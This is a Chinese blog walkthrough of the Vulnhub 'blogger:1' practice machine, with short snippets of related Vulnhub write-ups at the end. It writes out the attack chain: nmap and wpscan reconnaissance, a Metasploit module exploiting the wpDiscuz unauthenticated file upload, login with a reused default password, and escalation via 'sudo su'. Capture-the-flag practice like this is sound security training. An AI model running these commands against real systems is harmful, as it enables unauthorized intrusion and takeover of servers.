首页 > 其他分享 >Vulnhub: blogger:1靶机

Vulnhub: blogger:1靶机

时间:2023-08-03 20:11:45浏览次数:43  
标签:set assets blogger vagrant 192.168 blog Vulnhub 靶机

kali:192.168.111.111

靶机:192.168.111.176

信息收集

端口扫描

nmap -A -sC -v -sV -T5 -p- --script=http-enum 192.168.111.176

image

在80端口的/assets/fonts/目录下发现blog目录,访问后发现为wordpress

image

利用wpscan发现wordpress插件wpdiscuz存在任意文件上传漏洞

wpscan --url http://blogger.thm/assets/fonts/blog/ -e u,ap --plugins-detection mixed

image

image

漏洞利用

msf进行漏洞利用

use exploit/unix/webapp/wp_wpdiscuz_unauthenticated_file_upload
set targeturi /assets/fonts/blog/
set blogpath /?p=1
set rhosts blogger.thm
run

image

提权

vagrant用户的密码同样为vagrant

image

vagrant用户sudo权限

image

提升为root

sudo su

image

flag

image

标签:set,assets,blogger,vagrant,192.168,blog,Vulnhub,靶机
From: https://www.cnblogs.com/ctostm/p/17604331.html

相关文章

  • Vulnhub: hacksudo: aliens靶机
    kali:192.168.111.111靶机:192.168.111.175信息收集端口扫描nmap-A-sC-v-sV-T5-p---script=http-enum192.168.111.175目标80端口backup目录存在文件mysql.bak,下载后查看获得mysql账号密码登录9000端口的phpmyadmin,执行sql语句写入webshellselect'<?phpsystem($......
  • Vulnhub: BlueMoon: 2021靶机
    kali:192.168.111.111靶机:192.168.111.174信息收集端口扫描nmap-A-sC-v-sV-T5-p---script=http-enum192.168.111.17480端口目录爆破,发现文件:hidden_textgobusterdir-uhttp://192.168.111.174-w/usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-m......
  • vulnhub_DC_6_wp
    前言靶机地址:https://www.vulnhub.com/entry/dc-6,315/靶机下载地址:https://download.vulnhub.com/dc/DC-6.zip攻击机地址:192.168.20.135靶机探测nmap-sn192.168.20.0/24192.168.20.149为靶机地址端口扫描nmap-p-192.168.20.149详细信息扫描nmap-A-p22,80192.......
  • Vulnhub: Wayne Manor:1靶机
    kali:192.168.111.111靶机:192.168.111.172信息收集端口扫描nmap-A-sC-v-sV-T5-p---script=http-enum192.168.111.172根据提示修改hosts文件访问目标80,在主页发现三组数字,结合端口扫描的结果中21端口被过滤,猜测存在端口碰撞knock-v192.168.111.172300350400......
  • vlunhub靶场,kali扫不到靶机解决方法
    在靶机开机或者重启界面会出现下图界面,然后按e就可以进入编辑。 按e后就会进入下图界面。 在下图这个界面将 roquiet 改为 rwsingleinit=/bin/bash. 修改完成后按    ctrl+x  进入编辑输入ipa查看本地网卡名称,本机网络网卡名称为ens33ipa 进入i......
  • Vulnhub: shenron:3靶机
    kali:192.168.111.111靶机:192.168.111.171信息收集端口扫描nmap-A-sC-v-sV-T5-p---script=http-enum192.168.111.171修改hosts后访问目标80端口,发现是wordpresswpscan收集目标用户,爆破出密码:iloverockyouwpscan--urlhttp://shenron/-euwpscan--urlhttp://......
  • Vulnhub: hacksudo: search靶机
    kali:192.168.111.111靶机:192.168.111.170信息收集端口扫描nmap-A-sC-v-sV-T5-p---script=http-enum192.168.111.17080端口目录爆破feroxbuster-k-d1--urlhttp://192.168.111.170-w/opt/zidian/SecLists-2022.2/Discovery/Web-Content/directory-list-lower......
  • DC_4靶机的简单复现
    DC_41.nmapkali的IP:192.168.40.148扫描同网段的其他IP:nmap-sP192.168.40.148/24扫描结果:先IP后mac地址再通过查看DC_4的mac地址,可得DC_4靶机的IP:192.168.40.163全盘扫描:nmap-A192.168.40.163-p1-65535-oNnmap.A-A:该选项表示使用"Aggressive"扫......
  • Vulnhub: Coffee Addicts:1靶机
    kali:192.168.111.111靶机:192.168.111.158信息收集端口扫描nmap-A-sC-v-sV-T5-p---script=http-enum192.168.111.158访问80端口提示添加域名到hosts文件目录爆破,发现wordpress目录feroxbuster-k-d1--urlhttp://coffeeaddicts.thm-w/opt/zidian/SecLists-2......
  • Vulnhub: HackathonCTF: 2靶机
    kali:192.168.111.111靶机:192.168.111.147信息收集端口扫描nmap-A-sC-v-sV-T5-p---script=http-enum192.168.111.147ftp存在匿名登陆,其中存在字典文件80端口目录爆破feroxbuster-k-d1--urlhttp://192.168.111.147-w/opt/zidian/SecLists-2022.2/Discover......